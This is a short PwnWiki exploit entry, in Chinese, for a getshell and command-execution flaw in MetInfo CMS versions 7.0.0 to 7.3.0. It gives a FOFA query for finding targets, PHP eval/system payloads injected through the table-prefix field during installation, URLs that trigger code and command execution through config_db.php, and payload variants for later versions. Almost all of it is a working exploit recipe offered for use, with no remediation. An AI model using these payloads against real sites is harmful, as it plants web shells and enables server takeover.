Loading
0

米拓建站系统 getshell&命令执行漏洞/zh-hant

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

FOFA

body="MetInfo"

影响版本

7.3.0- 7.0.0

漏洞利用

在安装该CMS - 【设置数据库信息(数据表前缀)】:

代码执行Payload:

"/@eval($_GET'1');/

命令执行payload:

"/@system($_GET'1');/

点击保存进行下一步验证,出现报错信息

(这里的Payload是代码执行)

访问以下url:

http://<target>/config/config_db.php?1=phpinfo();

可以看到成功执行了phpinfo

(这里的Payload是命令执行)

访问以下URL:

http://<target>/config/config_db.php?1=id();

成功执行id命令。

其他

Version 7.10 
Payload:"/@eval($_GET'1');@system($_GET'2');/
Version 7.20
Payload: "/@eval($_GET'1');@system($_GET'2');/

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库